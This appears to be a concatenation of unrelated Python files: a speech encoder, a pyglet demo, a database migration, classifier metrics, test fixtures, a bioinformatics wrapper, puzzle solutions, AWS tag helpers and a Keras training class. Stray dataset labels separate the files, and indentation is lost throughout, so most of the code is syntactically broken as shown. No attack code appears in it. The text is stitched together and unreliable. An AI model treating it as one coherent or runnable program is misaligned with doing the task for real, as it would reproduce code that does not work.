# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=import-error, too-few-public-methods, too-many-locals
# pylint: disable=too-many-arguments, too-many-instance-attributes, invalid-name
"""
lstm_encoder.py: the implementation of lstm ctc
"""
__author__ = "Kyungmin Lee"
__email__ = "sephiroce@snu.ac.kr"
import math
import tensorflow as tf
import tfsr.helper.model_helper as mh
from tfsr.model.sequence_router import CapsulationLayer
class LstmEncoder(tf.keras.Model): #pylint: disable=too-many-ancestors
"""
An implementation of LSTM based speech encoders.
"""
def get_config(self):
pass
def __init__(self, config, vocab_n):
super().__init__()
self.mask = tf.keras.layers.Lambda(mh.feat_mask2, name="pad_mask")
num_layers = config.model_encoder_num
d_model = config.model_dimension
input_dropout = config.train_inp_dropout
inner_dropout = config.train_inn_dropout
init = config.model_initializer
self.d_model = d_model
self.num_layers = num_layers
if config.model_type.lower() == "blstm":
self.enc_layers = [tf.keras.layers.Bidirectional(tf.keras.layers.LSTM(
d_model, return_sequences=True, kernel_initializer=mh.get_init(
init)), merge_mode="ave") for _ in range(num_layers)]
else:
self.enc_layers = \
[tf.keras.layers.LSTM(d_model, return_sequences=True,
kernel_initializer=mh.get_init(init))
for _ in range(num_layers)]
self.layernorms = [tf.keras.layers.LayerNormalization(epsilon=1e-6)
for _ in range(num_layers)]
self.dropouts = [tf.keras.layers.Dropout(rate=inner_dropout)
for _ in range(num_layers)]
self.ln = tf.keras.layers.LayerNormalization(epsilon=1e-6)
self.mask_layer = tf.keras.layers.Masking(mask_value=0.0)
self.input_dropout = tf.keras.layers.Dropout(rate=input_dropout)
self.proj = tf.keras.layers.Dense(
vocab_n, kernel_initializer=mh.get_init(init), use_bias=False)
kernel_size = 3
self.stride = stride = config.model_conv_stride
self.cnn_n = cnn_n = config.model_conv_layer_num
self.feat_dim = math.ceil(config.feat_dim / (stride ** cnn_n))
self.nfilt = nfilt = config.model_conv_filter_num
self.conv = CapsulationLayer(cnn_n, nfilt, kernel_size, self.stride, init,
name="conv_feat") \
if config.model_lstm_is_cnnfe else None
self.in_len_div = stride ** cnn_n if config.model_lstm_is_cnnfe else 1
def call(self, embeddings, **kwargs):
# pylint: disable=arguments-differ
inp_len = kwargs["input_lengths"]
training = kwargs["training"]
if self.conv is not None:
embeddings, batch, seq_len = self.conv(embeddings, input_lengths=inp_len)
embeddings = tf.reshape(embeddings,
[batch, seq_len, self.feat_dim * self.nfilt],
name="reshape_conv")
embeddings = self.input_dropout(embeddings, training=training)
for idx, enc_layer in enumerate(self.enc_layers):
embeddings = enc_layer(embeddings)
embeddings = self.layernorms[idx](embeddings)
embeddings = self.dropouts[idx](embeddings, training=training)
embeddings = self.proj(embeddings)
embeddings = self.mask([embeddings, inp_len, self.in_len_div])
embeddings = self.mask_layer(embeddings)
return self.ln(embeddings)
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple demonstration of the HTMLLabel class, as it might be used on a
help or introductory screen.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import os
import pyglet
html = '''
<h1>HTML labels in pyglet</h1>
<p align="center"><img src="pyglet.png" /></p>
<p>HTML labels are a simple way to add formatted text to your application.
Different <font face="Helvetica,Arial" size=+2>fonts</font>, <em>styles</em>
and <font color=maroon>colours</font> are supported.
<p>This window has been made resizable; text will reflow to fit the new size.
'''
window = pyglet.window.Window(resizable=True)
location = pyglet.resource.FileLocation(os.path.dirname(__file__))
label = pyglet.text.HTMLLabel(html, location=location,
width=window.width,
multiline=True, anchor_y='center')
@window.event
def on_resize(width, height):
# Wrap text to the width of the window
label.width = window.width
# Keep text vertically centered in the window
label.y = window.height // 2
@window.event
def on_draw():
window.clear()
label.draw()
pyglet.gl.glClearColor(1, 1, 1, 1)
pyglet.app.run()
"""Replace block with 'lock'
Revision ID: 8192b68b7bd0
Revises: 3176777cd2bb
Create Date: 2021-01-20 20:48:40.867104
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = "8192b68b7bd0"
down_revision = "3176777cd2bb"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column("user", sa.Column("locked", sa.Boolean(), nullable=True))
op.drop_column("user", "blocked")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column(
"user",
sa.Column(
"blocked",
mysql.TINYINT(display_width=1),
autoincrement=False,
nullable=True,
),
)
op.drop_column("user", "locked")
# ### end Alembic commands ###
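# Illustrative commands for running this migration (assumes a configured alembic.ini):
#   alembic upgrade 8192b68b7bd0    # add user.locked, drop user.blocked
#   alembic downgrade 3176777cd2bb  # restore user.blocked, drop user.locked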
#TODO check whether dummy classifier also does this
def count_true_positive(two_column_data_set):
positive_count = 0
for data in two_column_data_set["class"]:
##Hate Speech is labelled 0 in this project
if data == 0:
positive_count += 1
return positive_count
def compute_precision(positive_count, two_column_data_set):
    # positive_count rows are false positives and the rest are true positives when everything is marked non-hate-speech
return (len(two_column_data_set["class"])-positive_count)/len(two_column_data_set["class"])
def compute_recall(positive_count, two_column_data_set):
    # always one, because there is never a false negative: nothing is ever labelled as hate speech
return (len(two_column_data_set["class"])-positive_count)/(len(two_column_data_set["class"])-positive_count)
def compute_accuracy(positive_count, two_column_data_set):
return (len(two_column_data_set["class"])-positive_count) / len(two_column_data_set["class"])
def compute_f_one(precision, recall):
return 2*precision*recall/(precision+recall)
def print_metrics(positive_count, two_column_data_set):
print("Accuracy: ", compute_accuracy(positive_count, two_column_data_set),"\n",
"Precision: ", compute_precision(positive_count, two_column_data_set), "\n",
"Recall: ", compute_recall(positive_count, two_column_data_set),"\n",
"F1: ", compute_f_one(compute_precision(positive_count, two_column_data_set), compute_recall(positive_count, two_column_data_set)))
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from src.data_schema.feature_names import FeatureNames
from src.data_preparation.input_data_schema import LasVegasGovtDataSchema
def plot_feature_stat(df, feature_xaxis, feature_yaxis, output_file):
##### construct list of mean, standard deviation, max values,###
# min values, used for graph datapoints #####
groups_df = df.groupby([feature_xaxis])
# mean_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].mean()
mean_df = groups_df.mean()
mean_list = mean_df[feature_yaxis]
feature_list = df.groupby([feature_xaxis])[feature_xaxis]
# sd_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].std()
sd_df = groups_df.std()
# df.groupby([feature_xaxis]).std()
sd_list = sd_df[feature_yaxis]
# min_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].min()
min_df = groups_df.min()
min_list = min_df[feature_yaxis]
# max_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].max()
max_df = groups_df.max()
max_list = max_df[feature_yaxis]
#### plot the mean, standard deviation, max value, min value in graph #####
plt.errorbar(np.arange(len(feature_list)), mean_list.values, sd_list.values, fmt='ok', ecolor='blue', lw=3)
plt.errorbar(np.arange(len(feature_list)), mean_list.values,
[mean_list.values - min_list.values, max_list.values - mean_list.values],
fmt='.k', ecolor='gray', lw=1)
#### Round off the score to two decimal places to be displayed in the graph #####
for i in range(len(mean_list)):
mean_list[i] = round(mean_list[i],2)
for i in range(len(min_list)):
min_list[i] = round(min_list[i],2)
for i in range(len(max_list)):
max_list[i] = round(max_list[i],2)
#### annonate the values of datapoint labels in the graph ######
for xy in zip(np.arange(len(feature_list)), mean_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), min_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), max_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
#### display/save the label on x and y axis #####
plt.xlabel(feature_xaxis)
plt.ylabel(feature_yaxis)
# plt.show()
plt.savefig(output_file)
if __name__ == '__main__':
file = '../../resources/dataset/final_lasvegas_dataset.csv'
output_file = '../../resources/images/graphs/price.png'
df = pd.read_csv(file)
schema_obj = FeatureNames()
df = df[[schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE]]
plot_feature_stat(df, schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE, output_file)
from .sqlalchemy_conftest import *  # noqa
import pytest
@pytest.fixture(scope="session", autouse=True)
def set_up_gcs_mock_tempdir(tmp_path_factory):
from .okta_mock import _Auth
from alchemy.shared import auth_backends
auth_backends.auth, auth_backends.__auth = _Auth(), auth_backends.auth
auth_backends.init_app, auth_backends.__init_app = (lambda app, auth: None), auth_backends.init_app
class ReverseMock:
def __init__(self):
self.bypass_original = None
def __enter__(self):
self.bypass_original = auth_backends.auth.bypass
auth_backends.auth.bypass = False
def __exit__(self, exc_type, exc_val, exc_tb):
auth_backends.auth.bypass = self.bypass_original
auth_backends.ReverseMock = ReverseMock
@pytest.fixture(scope="session", autouse=True)
def disable_cloud_logging():
import os
old_val = os.environ.get('USE_CLOUD_LOGGING', default=None)
os.environ['USE_CLOUD_LOGGING'] = '0'
yield
if old_val is None:
del os.environ['USE_CLOUD_LOGGING']
else:
os.environ['USE_CLOUD_LOGGING'] = old_val
import argparse
from snakemake.shell import shell
from .slurm_job import SlurmJob
from exceRNApipeline.includes.utils import logger
def pre_process(input_fq, adapter, log_file, prefix):
cmd = f"""
hts_Stats -L {log_file} -U {input_fq} | \\
hts_AdapterTrimmer -A -L {log_file} -a {adapter} | \\
hts_QWindowTrim -n -A -L {log_file} | \\
hts_NTrimmer -n -A -L {log_file} | \\
hts_Stats -A -L {log_file} -f {prefix}
"""
logger(cmd)
shell(cmd)
def parse_args():
parser = argparse.ArgumentParser(
description="[exRNA-pipeline] pre-processing"
)
parser.add_argument("-i", "--input-fq", type=str,
help="Path to the input fastq files.")
parser.add_argument("-o", "--output-fq", type=str,
help="Path to t he output fastq files.")
parser.add_argument("-n", "--sample-name", type=str,
help="Sample name")
parser.add_argument("-a", "--adapter", type=str,
help="Adapter sequence.")
parser.add_argument("-l", "--log-file", type=str,
help="Path to the log file.")
parser.add_argument("-p", "--prefix", type=str,
help="Output prefix")
parser.add_argument("-s", "--scratch-dir", type=str,
help="Path to the scratch diractory.")
args = parser.parse_args()
if args.scratch_dir == "None":
args.scratch_dir = None
return args
def main():
args = parse_args()
if args.scratch_dir:
with SlurmJob(args.scratch_dir) as slurm:
pre_process(
args.input_fq, args.adapter,
f"{slurm.scratch}/{args.sample_name}.htsStats.log",
f"{slurm.scratch}/{args.sample_name}"
)
cmd = f"""
mv {slurm.scratch}/{args.sample_name}_SE.fastq.gz {args.output_fq}
mv {slurm.scratch}/{args.sample_name}.htsStats.log {args.log_file}
"""
logger(cmd)
shell(cmd)
else:
pre_process(args.input_fq, args.adapter,
                    args.log_file, args.prefix)
if __name__ == "__main__":
main()
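# Hypothetical invocation sketch (module path, file names and adapter are made up;
# passing -s None keeps the run local instead of using a SLURM scratch directory):
#   python -m <package>.preprocess -i sample.fastq.gz -o sample_trimmed.fastq.gz \
#       -n sample -a AGATCGGAAGAGC -l sample.htsStats.log -p sample -s None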
import pandas as pd
import csv
original_csv = pd.read_csv('./Fuzzy_dataset.csv')
normal_csv = open('./fuzzy_normal_dataset.csv', 'w', newline='', encoding='utf-8')
normal_csv_file = csv.writer(normal_csv)
abnormal_csv = open('./fuzzy_abnormal_dataset.csv', 'w', newline='', encoding='utf-8')
abnormal_csv_file = csv.writer(abnormal_csv)
idx = 0
normal_first = False
abnormal_first = False
while idx < len(original_csv) // 30:
original_row = original_csv.iloc[idx]
number_of_data = original_row[2]
is_regular = (original_row[number_of_data + 3] == 'R')
original_row.dropna(inplace=True)
if is_regular:
if not normal_first and number_of_data != 8:
idx += 1
continue
normal_first = True
normal_csv_file.writerow(original_row[1:])
else:
if not abnormal_first and number_of_data != 8:
idx += 1
continue
abnormal_first = True
abnormal_csv_file.writerow(original_row[1:])
idx += 1
if idx % 500000 == 0:
print(idx)
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 15:34:32 2018
@author: wangyu
"""
import socket
import sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # same as on the server side
try:
sock.connect(('127.0.0.1',1052))
except socket.error as e:
print(e)
sys.exit(-1)
data_send = 'test'
sock.send(data_send.encode())
data_recv = sock.recv(98)
print('received len is %d, the received content is %s' % (len(data_recv), data_recv.decode()))
sock.close()
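# Hypothetical counterpart server sketch (not part of the original script); run it in a
# separate process before the client above. It accepts one connection and echoes the
# payload back.
def _demo_echo_server():
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(('127.0.0.1', 1052))
    server.listen(1)
    conn, addr = server.accept()
    conn.send(conn.recv(98))
    conn.close()
    server.close()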
from .settings import *
from .user_groups import *
import unittest
from unittest.mock import Mock, patch
from nuplan.common.actor_state.scene_object import SceneObject, SceneObjectMetadata
class TestSceneObject(unittest.TestCase):
"""Tests SceneObject class"""
@patch("nuplan.common.actor_state.tracked_objects_types.TrackedObjectType")
@patch("nuplan.common.actor_state.oriented_box.OrientedBox")
def test_initialization(self, mock_box: Mock, mock_tracked_object_type: Mock) -> None:
"""Tests that agents can be initialized correctly"""
scene_object = SceneObject(mock_tracked_object_type, mock_box, SceneObjectMetadata(1, "123", 1, "456"))
self.assertEqual("123", scene_object.token)
self.assertEqual("456", scene_object.track_token)
self.assertEqual(mock_box, scene_object.box)
self.assertEqual(mock_tracked_object_type, scene_object.tracked_object_type)
@patch("nuplan.common.actor_state.scene_object.StateSE2")
@patch("nuplan.common.actor_state.scene_object.OrientedBox")
@patch("nuplan.common.actor_state.scene_object.TrackedObjectType")
@patch("nuplan.common.actor_state.scene_object.SceneObject.__init__")
def test_construction(self, mock_init: Mock, mock_type: Mock, mock_box_object: Mock, mock_state: Mock) -> None:
"""Test that agents can be constructed correctly."""
mock_init.return_value = None
mock_box = Mock()
mock_box_object.return_value = mock_box
_ = SceneObject.from_raw_params("123", "123", 1, 1, mock_state, size=(3, 2, 1))
mock_box_object.assert_called_with(mock_state, width=3, length=2, height=1)
mock_init.assert_called_with(
metadata=SceneObjectMetadata(token="123", track_token="123", timestamp_us=1, track_id=1),
tracked_object_type=mock_type.GENERIC_OBJECT,
oriented_box=mock_box,
)
if __name__ == '__main__':
unittest.main()
# @Title: The repeated number in an array (LCOF)
# @Author: 18015528893
# @Date: 2021-02-28 16:44:53
# @Runtime: 52 ms
# @Memory: 23.4 MB
from typing import List


class Solution:
def findRepeatNumber(self, nums: List[int]) -> int:
for i in range(len(nums)):
while nums[i] != i:
if nums[nums[i]] == nums[i]:
return nums[i]
else:
nums[nums[i]], nums[i] = nums[i], nums[nums[i]]
return -1
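# Illustrative check (a typical input for this problem): the in-place cyclic placement
# returns one of the duplicated values.
#   Solution().findRepeatNumber([2, 3, 1, 0, 2, 5, 3])  # -> 2 here; any duplicate is a valid answer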
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import logging
import boto3
from assertpy import assert_that
from utils import get_root_volume_id
def convert_tags_dicts_to_tags_list(tags_dicts):
"""Convert dicts of the form {key: value} to a list like [{"Key": key, "Value": value}]."""
tags_list = []
for tags_dict in tags_dicts:
tags_list.extend([{"Key": key, "Value": value} for key, value in tags_dict.items()])
return tags_list
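# Illustrative example of the flattening performed above:
#   convert_tags_dicts_to_tags_list([{"Key1": "Value1"}, {"Key2": "Value2", "Key3": "Value3"}])
#   -> [{"Key": "Key1", "Value": "Value1"},
#       {"Key": "Key2", "Value": "Value2"},
#       {"Key": "Key3", "Value": "Value3"}]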
def get_cloudformation_tags(region, stack_name):
"""
Return the tags for the CFN stack with the given name
    The returned value is a list like the following:
[
{'Key': 'Key2', 'Value': 'Value2'},
{'Key': 'Key1', 'Value': 'Value1'},
]
"""
cfn_client = boto3.client("cloudformation", region_name=region)
response = cfn_client.describe_stacks(StackName=stack_name)
return response["Stacks"][0]["Tags"]
def get_main_stack_tags(cluster):
"""Return the tags for the cluster's main CFN stack."""
return get_cloudformation_tags(cluster.region, cluster.cfn_name)
def get_ec2_instance_tags(instance_id, region):
"""Return a list of tags associated with the given EC2 instance."""
logging.info("Getting tags for instance %s", instance_id)
return (
boto3.client("ec2", region_name=region)
.describe_instances(InstanceIds=[instance_id])
.get("Reservations")[0]
.get("Instances")[0]
.get("Tags")
)
def get_tags_for_volume(volume_id, region):
"""Return the tags attached to the given EBS volume."""
logging.info("Getting tags for volume %s", volume_id)
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_head_node_root_volume_tags(cluster, os):
"""Return the given cluster's head node's root volume's tags."""
root_volume_id = get_root_volume_id(cluster.head_node_instance_id, cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_head_node_tags(cluster):
"""Return the given cluster's head node's tags."""
return get_ec2_instance_tags(cluster.head_node_instance_id, cluster.region)
def get_compute_node_root_volume_tags(cluster, os):
"""Return the given cluster's compute node's root volume's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
root_volume_id = get_root_volume_id(compute_nodes[0], cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_compute_node_tags(cluster):
"""Return the given cluster's compute node's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
return get_ec2_instance_tags(compute_nodes[0], cluster.region)
def get_ebs_volume_tags(volume_id, region):
"""Return the tags associated with the given EBS volume."""
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_shared_volume_tags(cluster):
"""Return the given cluster's EBS volume's tags."""
shared_volume = cluster.cfn_resources.get("EBS0")
return get_ebs_volume_tags(shared_volume, cluster.region)
"""
Helper module allowing src modules to be imported into tests
"""
# pylint: disable=wrong-import-position
# pylint: disable=unused-import
import os
import sys
from blockutils.common import ensure_data_directories_exist
from blockutils.stac import STACQuery
# NOTE: this must be before the modis and gibs imports - else tests will not find path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../src")))
from src.gibs import (
GibsAPI,
extract_query_dates,
make_list_layer_band,
move_dates_to_past,
)
from src.modis import Modis
from .context import get_puzzle, get_solution_script
index = 7
INPUT = """
16,1,2,0,4,2,7,1,2,14
"""[1:-1].split("\n")
def test_d7p1():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p1 = script("d7p1")
assert d7p1 is not None, "d7p1 is none"
result = d7p1(INPUT)
assert result == 37, f"result is not 37: {result}"
def test_d7p2():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p2 = script("d7p2")
assert d7p2 is not None, "d7p2 is none"
result = d7p2(INPUT)
assert result == 168, f"result is not 168: {result}"
|
nilq/baby-python
|
python
|
from collections import deque
def getIsWall(data):
favoriteNumber = int(data)
def isWall(x, y):
if y < 0 or x < 0:
return True
n = favoriteNumber + x * x + 3 * x + 2 * x * y + y + y * y
wall = 0
while n:
wall ^= n & 1
n >>= 1
return bool(wall)
return isWall
def search(isWall, goal):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen:
continue
seen.add(curr)
if curr == goal:
return steps
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
def searchMaxSteps(isWall, maxSteps):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen or steps > maxSteps:
continue
seen.add(curr)
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
return len(seen)
def part1(data):
return search(getIsWall(data), (31, 39))
def part2(data):
return searchMaxSteps(getIsWall(data), 50)
if __name__ == "__main__":
from aocd import get_data
data = get_data(year=2016, day=13)
print(part1(data))
print(part2(data))
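# Sanity check from the puzzle's worked example (favourite number 10): reaching the
# coordinate (7, 4) takes 11 steps, i.e. search(getIsWall("10"), (7, 4)) == 11.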
# coding: utf-8
import cv2, os, sys
from PIL import Image
import numpy as np
import os
from tensorflow import keras
from tensorflow.keras.layers import Input
from .Models import GoogLeNetModel
from .Models import VGG16Model
from .Models import InceptionV3Model
from .Models import MobileNetModel
from .Models import ResNet50Model
from . import const
from . import DA
from . import DA_setting
from main.log import get_logger
logger = get_logger(__name__)
class BaseNetwork(object):
def __init__(self, **params):
self.channel = params['channel'] if 'channel' in params else 3
self.classes = params['classes'] if 'classes' in params else 1
self.network = params['network']
self.input_size = params['input_size'] if 'input_size' in params else None
self.mean_image = params['mean_image'] if 'mean_image' in params else None
self.image_type = params['image_type'] if 'image_type' in params else None
self.xn = None
self.yn = None
self.val_xn = None
self.val_yn = None
self.pred_xn = None
self.pred_yn = None
def generate_train_data(self, train_list, da, batch_size):
# count = 0
while True:
for data in train_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "test_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.xn is None:
self.xn = da_im
self.yn = y
else:
self.xn = np.vstack((self.xn, da_im))
self.yn = np.vstack((self.yn, y))
if len(self.xn) == batch_size:
input_xn = self.xn
input_yn = self.yn
self.xn = None
self.yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_val_data(self, val_list, da, batch_size):
# count = 0
while True:
for data in val_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "val_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.val_xn is None:
self.val_xn = da_im
self.val_yn = y
else:
self.val_xn = np.vstack((self.val_xn, da_im))
self.val_yn = np.vstack((self.val_yn, y))
if len(self.val_xn) == batch_size:
input_xn = self.val_xn
input_yn = self.val_yn
self.val_xn = None
self.val_yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_predict_data(self, test_list, batch_size):
while True:
for data in test_list:
image = self._get_image_array(data[0], #train_path,
resize=self.input_size,
dtype=np.uint8,
normalization=False)
image = image[np.newaxis,:,:,:]
image = image.astype(np.float32)
image /= 255
if self.pred_xn is None:
self.pred_xn = image
else:
self.pred_xn = np.vstack((self.pred_xn, image))
if len(self.pred_xn) == batch_size:
input_xn = self.pred_xn
self.pred_xn = None
yield(input_xn)
def _get_image_array(self, path, **params):
dtype = params['dtype'] if 'dtype' in params else np.float32
resize = params['resize'] if 'resize' in params else None
normalization = params['normalization'] if 'normalization' in params else False
if self.channel == 1:
#img = Image.open(path).convert('L')
img = Image.open(path).convert('RGB')
elif self.channel == 3:
img = Image.open(path).convert('RGB')
else:
img = Image.open(path).convert('RGB')
im_arr = np.asarray(img)
if resize is not None:
im_arr = cv2.resize(im_arr, tuple(resize), interpolation=cv2.INTER_CUBIC)
# 8bit image convert [w,h,1]
# 32 bit image keep [w,h,3]
if im_arr.ndim == 2:
im_arr = im_arr[:,:,np.newaxis]
# drop the alpha channel if the image is RGBA
if im_arr.ndim == 3 and im_arr.shape[2] == 4:
im_arr = im_arr[:,:,:3]
im_arr = im_arr.astype(dtype)
# use mean image
if self.mean_image is not None:
mean = Image.open(self.mean_image).convert('RGB')
mean_arr = np.asarray(mean)
im_arr -= mean_arr
if normalization == True:
im_arr /= 255
return im_arr
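# Illustrative call (hypothetical path): with channel=3 and input_size=[224, 224],
# self._get_image_array("sample.jpg", resize=self.input_size, dtype=np.uint8)
# returns a (224, 224, 3) uint8 array with no mean subtraction or normalization.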
'''
def _resize_array(self, image):
if image.shape[0] != self.input_size[0] or image.shape[1] != self.input_size[1]:
if image.dtype == np.float32 or image.dtype == np.float64:
if K.image_dim_ordering() == 'th':
image = image[0,:,:]
else:
image = image[:,:,0]
im = Image.fromarray(image)
im = im.resize(self.input_size, resample=Image.BICUBIC)
image = np.asarray(im)
if K.image_dim_ordering() == 'th':
image = image[np.newaxis,:,:]
else:
image = image[:,:,np.newaxis]
return image
'''
class Network(BaseNetwork):
def __init__(self, **params):
super(Network,self).__init__(**params)
input_tensor = Input(shape=(self.input_size[0], self.input_size[1], self.channel))
# input_tensor = Input(shape=(self.input_size[0], self.input_size[1], 3))
self.model = None
logger.debug(self.network)
if self.network == const.GOOGLE_NET:
# self.model = InceptionV3Model(self.classes,input_tensor).model
# self.model = GoogLeNetModel(self.classes, None, self.channel, self.input_size).model
self.model = GoogLeNetModel(self.classes, None, 3, self.input_size).model
elif self.network == const.VGG16:
self.model = VGG16Model(self.classes,input_tensor).model
elif self.network == const.MOBILE_NET:
self.model = MobileNetModel(self.classes,input_tensor).model
elif self.network == const.RESNET50:
self.model = ResNet50Model(self.classes,input_tensor).model
# self.model.summary()
def train(self, train_data, val_data, **params):
epochs = params['epochs'] if 'epochs' in params else 1
callbacks = params['callbacks'] if 'callbacks' in params else None
batch = params['batch'] if 'batch' in params else 1
val_batch = params['val_batch'] if 'val_batch' in params else 1
da_params = params['data_augmentation'] if 'data_augmentation' in params else None
da= DA_setting.run(da_params)
da_instance = DA.DataAugmentation(da)
train_data = da_instance.create_data_list(train_data)
val_data = da_instance.create_data_list(val_data)
train_data_batch_num = len(train_data) // batch
if train_data_batch_num < 1:
logger.debug('train_data_batch_num < 1')
sys.exit(1)
if val_data is not None:
val_data_batch_num = len(val_data) // val_batch
logger.debug(val_data_batch_num)
if val_data_batch_num < 1:
logger.debug('val_data_batch_num < 1')
sys.exit(1)
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
validation_data=self.generate_val_data(val_data, da_instance, val_batch),
validation_steps=val_data_batch_num,
callbacks=callbacks,
verbose=1)
else:
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
callbacks=callbacks,
verbose=1)
def save(self, path):
self.model.save(path)
def predict(self, data_list, **params):
batch = params['batch'] if 'batch' in params else 1
return self.model.predict_generator(
self.generate_predict_data(data_list, batch),#, da_instance),
steps=len(data_list) // batch,
verbose=1)
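# Minimal usage sketch (parameter values are assumptions, for illustration only).
# Each data entry is [image_path, label, optional_da_info], mirroring the generators above:
# net = Network(network=const.VGG16, classes=2, input_size=[224, 224], channel=3)
# net.train(train_list, val_list, epochs=10, batch=16, val_batch=16)
# net.save("model.h5")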
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
from argparse import ArgumentParser
import sys
parser = ArgumentParser(description="Run the test suite.")
parser.add_argument(
"--failfast",
action="store_true",
default=False,
